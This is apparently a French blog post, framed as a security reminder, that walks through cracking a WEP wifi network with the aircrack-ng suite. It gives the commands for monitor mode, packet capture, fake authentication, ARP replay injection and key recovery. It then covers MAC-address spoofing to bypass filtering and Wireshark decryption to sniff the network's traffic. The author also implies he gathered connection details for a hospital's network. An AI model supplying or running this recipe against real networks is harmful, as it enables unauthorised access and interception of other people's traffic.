Cette semaine j’ai été surpris d’apercevoir, dans un centre hospitalier, un spot wifi (professionnel) avec du WEP. Même si il y avait du filtrage par adresse mac et le service DHCP était coupé, cela m’a pris quelques minutes supplémentaires pour obtenir toutes les informations nécessaires à la connexion de ce réseau… Alors je me suis dit qu’un petit rappel sur la sécurité des réseaux wifi pourrait être utile afin d’éviter l’hara-kiri.
Pour la suite de la démonstration, on prendra pour acquis les éléments suivants :
- MAC adresse du point d’accès cible : 00:CA:FE:BA:BE:FF
- MAC adresse du client connecté sur le point d’accès : 00:BA:BE:CA:FE:FF
- BSSID du point d’accès cible : POVWEP
Dans un premier temps, je mets ma carte wifi en mode monitor :
airmon-ng start wlan0
Puis je lance airodump-ng, il permet de scanner les réseaux wifi. Airodump-ng est simple d’utilisation.
Usage: airodump-ng
Airodump-ng offre une multitude d’options et de filtres afin de cibler ce que l’on souhaite surveiller.
Options airodump-ng:
-w permet de créer un fichier de capture dans lequel seront enregistrés tous les paquets.
Exemple: airodump-ng -w out wlan0
–encrypt permet de filtrer les réseaux en fonction du type d’encryption utilisé.
Exemple: airodump-ng –encrypt wep wlan0 (seuls les réseaux en WEP seront affichés)
-c permet de cibler l’écoute sur un canal wifi particulier.
Exemple: airodump-ng -c 10 wlan0 (airodump-ng n’écoutera que le canal 10)
–bssid permet de ne cibler qu’un seul point d’accès en fonction de son adresse mac.
Exemple: airodump-ng –bssid 00:CA:FE:BA:BE:FF wlan0 (airodump-ng ne surveillera que le point d’accès dont l’adresse mac est 00:CA:FE:BA:BE:3F)
Donc si je veux faire un tour d’horizon ce que qui ce passe dans le coin, je lance :
airodump-ng wlan0
Je peux apercevoir que le point d’accès 00:CA:FE:BA:BE:FF a du WEP et un client connecté. Parfait, nous pouvons commencer. On lance un autre airodump qui va créer un fichier de capture. Ce fichier de capture sera utilisé par aireplay pour rejouer les ARP (injections de paquets).
airodump-ng -w out -c 10 –bssid 00:CA:FE:BA:BE:FF wlan0
Maintenant que nous sommes focalisé sur notre point d’accès et que nous avons un client connecté, nous pouvons tenter de nous associer au point d’accès avec aireplay :
aireplay-ng
Voici les différentes options de aireplay :
–deauth count : deauthenticate 1 or all stations (-0)
–fakeauth delay : fake authentication with AP (-1)
–interactive : interactive frame selection (-2)
–arpreplay : standard ARP-request replay (-3)
–chopchop : decrypt/chopchop WEP packet (-4)
–fragment : generates valid keystream (-5)
–caffe-latte : query a client for new IVs (-6)
–cfrag : fragments against a client (-7)
–test : tests injection and quality (-9)
On utilise l’option -1 fakeauth (association & authentification) pour notre test :
aireplay-ng -1 0 -e POVWEP -a 00:CA:FE:BA:BE:FF -b 00:CA:FE:BA:BE:FF -h 00:BA:BE:CA:FE:FF wlan0
POVWEP: essid (nom du réseau wifi)
00:CA:FE:BA:BE:FF: adresse mac du point d’accès
00:BA:BE:CA:FE:FF: adresse mac du client (“station” sous airodump-ng)
wlan0: notre interface wifi
Maintenant nous pouvons lancer notre attaque par rejeux d’ARP (injection de paquets). On utilise l’option -3 standard ARP-request replay (rejeu d’arp) :
aireplay-ng -3 -e Livebox-a1b2 -a 00:CA:FE:BA:BE:FF -b 00:CA:FE:BA:BE:FF -h 00:BA:BE:CA:FE:FF -x 600 -r out-01.cap wlan0
POVWEP: essid (nom du réseau wifi)
00:CA:FE:BA:BE:FF: adresse mac du point d’accès
00:BA:BE:CA:FE:FF: adresse mac du client (“station” sous airodump-ng)
600: nombre de paquets par secondes qui seront injectés (à régler en fonction de la qualité du signal wifi)
out-01.cap: notre fichier de capture airodump-ng
wlan0: notre interface wifi
Il ne reste plus qu’attendre afin d’obtenir 40000 ARP pour décrypter la clé WEP. Une fois vos 40000 ARP dans votre fichier de capture, il ne reste plus qu’à décrypter la clé à l’aide de aircrack.
Aircrack-ng est très simple d’utilisation.
usage: aircrack-ng [options] <.cap / .ivs file(s)>
Dans notre cas, nous allons utiliser la commande suivante :
aircrack-ng out-01.cap
Quelques minutes après vous pourrez voir :
KEY FOUND! [ FA:E6:18:26:27:56:B5:4D:C5:31:40:71:56 ]
Maintenant si le réseau fait du filtrage par MAC adresse vous avez déjà un mac adresse de disponible, utilisez là :
ifconfig wlan0 hw ether 00:BA:BE:CA:FE:FF
Et si le service DHCP n’est pas activé, vous pouvez utiliser wireshark afin de définir l’adressage du réseau. Commencez par lancer wireshark.
Puis configurer wireshark pour qu’il décrypte les paquets avec la clé WEP que vous venez juste de décrypter.
Allez dans Edit\preferences\protocols\IEEE 802.11
puis entrer la clé WEP
Cochez Assume packets have FCS et enable decryption
Vous pouvez commencer à sniffer en allant dans capture\options
Si vous voulez être plus granulaire dans votre recherche vous pouvez faire un filtre sur votre point d’accès :
(wlan.bssid==00:CA:FE:BA:BE:FF) && (tcp)
Vous allez découvrir des choses intéressantes.
Deux formules à retenir (dont une que j’empreinte à sid) :
WPA != PSK + TKIP
WIFI != WEP